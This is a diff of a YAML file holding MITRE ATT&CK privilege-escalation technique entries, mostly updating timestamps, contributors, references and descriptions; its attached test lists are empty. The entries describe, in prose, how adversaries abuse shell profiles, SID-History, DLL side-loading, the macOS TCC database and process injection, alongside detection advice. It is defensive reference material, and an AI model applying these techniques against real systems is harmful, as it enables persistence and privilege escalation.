-      - source_name: intezer-kaiji-malware
-        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
-        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
-          turning to Golang. Retrieved December 17, 2020.'
-      - source_name: bencane blog bashrc
-        url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
-        description: Benjamin Cane. (2013, September 16). Understanding a little more
-          about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
-      - source_name: anomali-rocke-tactics
-        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
-        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
-          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
-          December 17, 2020.
-      - source_name: Linux manual bash invocation
-        url: https://wiki.archlinux.org/index.php/Bash#Invocation
-        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
-      - source_name: Tsunami
-        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
-        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
-          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
-      - source_name: anomali-linux-rabbit
-        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
-        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
-          Malware Out of a Hat. Retrieved December 17, 2020.
-      - source_name: Magento
-        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
-        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
-          Vector. Retrieved December 17, 2020.
-      - source_name: ScriptingOSX zsh
-        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
-        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
-          Files. Retrieved February 25, 2021.'
-      - source_name: PersistentJXA_leopitt
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
-          for macOS. Retrieved January 11, 2021.
-      - source_name: code_persistence_zsh
-        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
-        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
-          Retrieved January 11, 2021.
-      - source_name: macOS MS office sandbox escape
-        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
-        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
-          Retrieved August 20, 2021.
-      - source_name: ESF_filemonitor
-        url: https://objective-see.com/blog/blog_0x48.html
-        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
-          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-25T15:02:24.143Z'
       name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
       description: "Adversaries may establish persistence through executing malicious
         commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
@@ -21616,6 +21854,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: persistence
+      x_mitre_contributors:
+      - Robert Wilson
+      - Tony Lambert, Red Canary
+      x_mitre_deprecated: false
       x_mitre_detection: "While users may customize their shell profile files, there
         are only certain types of commands that typically appear in these files. Monitor
         for abnormal commands such as execution of unknown programs, opening network
@@ -21626,9 +21868,13 @@ privilege-escalation:
         events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
         most Linux and macOS systems, a list of file paths for valid shell options
         available on a system are located in the <code>/etc/shells</code> file.\n"
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
       x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -21637,8 +21883,67 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+      created: '2020-01-24T14:13:45.936Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/004
+        external_id: T1546.004
+      - source_name: anomali-linux-rabbit
+        description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+          Malware Out of a Hat. Retrieved December 17, 2020.
+        url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+      - source_name: anomali-rocke-tactics
+        description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+          Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+          December 17, 2020.
+        url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+      - source_name: Linux manual bash invocation
+        description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+        url: https://wiki.archlinux.org/index.php/Bash#Invocation
+      - source_name: ScriptingOSX zsh
+        description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+          Files. Retrieved February 25, 2021.'
+        url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+      - source_name: bencane blog bashrc
+        description: Benjamin Cane. (2013, September 16). Understanding a little more
+          about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+        url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+      - source_name: macOS MS office sandbox escape
+        description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+          Retrieved August 20, 2021.
+        url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+      - source_name: Magento
+        description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+          Vector. Retrieved December 17, 2020.
+        url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+      - source_name: Tsunami
+        description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+          Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+        url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+      - source_name: PersistentJXA_leopitt
+        description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+          for macOS. Retrieved January 11, 2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: code_persistence_zsh
+        description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+          Retrieved January 11, 2021.
+        url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+      - source_name: ESF_filemonitor
+        description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+          with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+        url: https://objective-see.com/blog/blog_0x48.html
+      - source_name: intezer-kaiji-malware
+        description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+          turning to Golang. Retrieved December 17, 2020.'
+        url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1546.004
     atomic_tests: []
   T1134.005:
@@ -21684,7 +21989,7 @@ privilege-escalation:
         description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
           30, 2017.
         source_name: Microsoft DsAddSidHistory
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-02-09T15:49:58.414Z'
       name: 'Access Token Manipulation: SID-History Injection'
       description: |-
         Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21709,13 +22014,11 @@ privilege-escalation:
       x_mitre_permissions_required:
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1134.005
     atomic_tests: []
   T1548.004:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T16:35:18.492Z'
       name: Elevated Execution with Prompt
       description: "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code>
         API to escalate privileges by prompting the user for credentials.(Citation:
@@ -21795,7 +22098,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.002:
     technique:
@@ -21831,7 +22133,7 @@ privilege-escalation:
         Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
 
         Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=&lt;target binary&gt;</code>. The binary will then be executed by the system when the authentication packages are loaded.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:29:36.291Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: Authentication Package
       x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21854,12 +22156,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.002
     atomic_tests: []
   T1546.015:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:34:29.402Z'
       name: 'Event Triggered Execution: Component Object Model Hijacking'
       description: "Adversaries may establish persistence by executing malicious content
         triggered by hijacked references to Component Object Model (COM) objects.
@@ -21937,12 +22238,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.015
     atomic_tests: []
   T1574.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:35.788Z'
       name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
       description: |-
         Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -22003,7 +22303,6 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.009
     atomic_tests: []
   T1037.005:
@@ -22047,7 +22346,7 @@ privilege-escalation:
         mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
         StartupItems run during the bootup phase of macOS, they will run as the elevated
         root user."
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:43:21.560Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Initialization Scripts: Startup Items'
       x_mitre_detection: |-
@@ -22069,7 +22368,6 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.005
     atomic_tests: []
   T1078.002:
@@ -22150,7 +22448,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.003:
     technique:
@@ -22173,7 +22470,7 @@ privilege-escalation:
         description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
           Active Directory Users and Computers in Windows Server 2008. Retrieved November
           15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:25.625Z'
       name: Network Logon Script
       description: "Adversaries may use network logon scripts automatically executed
         at logon initialization to establish persistence. Network logon scripts can
@@ -22203,12 +22500,10 @@ privilege-escalation:
       - 'File: File Modification'
       - 'Process: Process Creation'
       - 'File: File Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.010:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-04-21T12:33:45.568Z'
       name: 'Event Triggered Execution: AppInit DLLs'
       description: "Adversaries may establish persistence and/or elevate privileges
         by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -22293,7 +22588,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.010
     atomic_tests: []
   T1546.002:
@@ -22358,7 +22652,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.002
     atomic_tests: []
   T1543.001:
@@ -22433,7 +22726,7 @@ privilege-escalation:
         benign software. Launch Agents are created with user level privileges and
         execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
         OceanLotus for OS X) "
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-21T16:13:00.598Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Create or Modify System Process: Launch Agent'
       x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22461,7 +22754,6 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.001
     atomic_tests: []
   T1055.009:
@@ -22492,7 +22784,7 @@ privilege-escalation:
         url: http://man7.org/linux/man-pages/man1/dd.1.html
         description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
           February 21, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-06-20T22:25:55.331Z'
       name: Proc Memory
       description: "Adversaries may inject malicious code into processes via the /proc
         filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22535,12 +22827,10 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Application control
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1546.016:
     technique:
-      modified: '2024-04-12T02:23:44.583Z'
+      modified: '2024-04-28T15:52:44.332Z'
       name: Installer Packages
       description: |-
         Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22557,7 +22847,7 @@ privilege-escalation:
         phase_name: persistence
       x_mitre_contributors:
       - Brandon Dalton @PartyD0lphin
-      - Alexander Rodchenko
+      - Rodchenko Aleksandr
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -22616,7 +22906,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1037.004:
     technique:
@@ -22698,12 +22987,11 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1037.004
     atomic_tests: []
   T1134:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.762Z'
       name: Access Token Manipulation
       description: |-
         Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22800,7 +23088,6 @@ privilege-escalation:
         url: https://pentestlab.blog/2017/04/03/token-manipulation/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1543.002:
     technique:
@@ -22914,7 +23201,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1543.002
     atomic_tests: []
   T1547.013:
@@ -22984,7 +23270,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.005:
     technique:
@@ -23012,7 +23297,7 @@ privilege-escalation:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:24:54.198Z'
       name: Thread Local Storage
       description: "Adversaries may inject malicious code into processes via thread
         local storage (TLS) callbacks in order to evade process-based defenses as
@@ -23056,8 +23341,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1547.007:
     technique:
@@ -23093,7 +23376,7 @@ privilege-escalation:
         Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named <code>com.apple.loginwindow.[UUID].plist</code> within the <code>~/Library/Preferences/ByHost</code> directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon.
 
         Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the <code>com.apple.loginwindow.[UUID].plist</code> file to execute payloads when a user logs in.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-19T23:46:56.443Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: Re-opened Applications'
       x_mitre_detection: Monitoring the specific plist files associated with reopening
@@ -23112,12 +23395,11 @@ privilege-escalation:
       - User
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.007
     atomic_tests: []
   T1574.002:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:47.241Z'
       name: 'Hijack Execution Flow: DLL Side-Loading'
       description: |-
         Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
@@ -23167,12 +23449,11 @@ privilege-escalation:
         url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1574.002
     atomic_tests: []
   T1098.002:
     technique:
-      modified: '2024-01-03T15:46:06.706Z'
+      modified: '2024-10-15T15:37:25.303Z'
       name: 'Account Manipulation: Additional Email Delegate Permissions'
       description: "Adversaries may grant additional permission levels to maintain
         persistent access to an adversary-controlled email account. \n\nFor example,
@@ -23205,9 +23486,10 @@ privilege-escalation:
       x_mitre_contributors:
       - Microsoft Detection and Response Team (DART)
       - Mike Burns, Mandiant
-      - Naveen Vijayaraghavan, Nilesh Dherange (Gurucul)
       - Jannie Li, Microsoft Threat Intelligence Center (MSTIC)
       - Arad Inbar, Fidelis Security
+      - Nilesh Dherange (Gurucul)
+      - Naveen Vijayaraghavan
       x_mitre_deprecated: false
       x_mitre_detection: "Monitor for unusual Exchange and Office 365 email account
         permissions changes that may indicate excessively broad permissions being
@@ -23224,9 +23506,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '2.1'
+      - Office Suite
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Group: Group Modification'
       - 'Application Log: Application Log Content'
@@ -23272,38 +23553,19 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1098.002
     atomic_tests: []
   T1548.006:
     technique:
-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23311,6 +23573,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23318,7 +23582,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23348,7 +23612,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23394,7 +23657,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23439,8 +23702,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23466,7 +23727,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23492,59 +23753,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
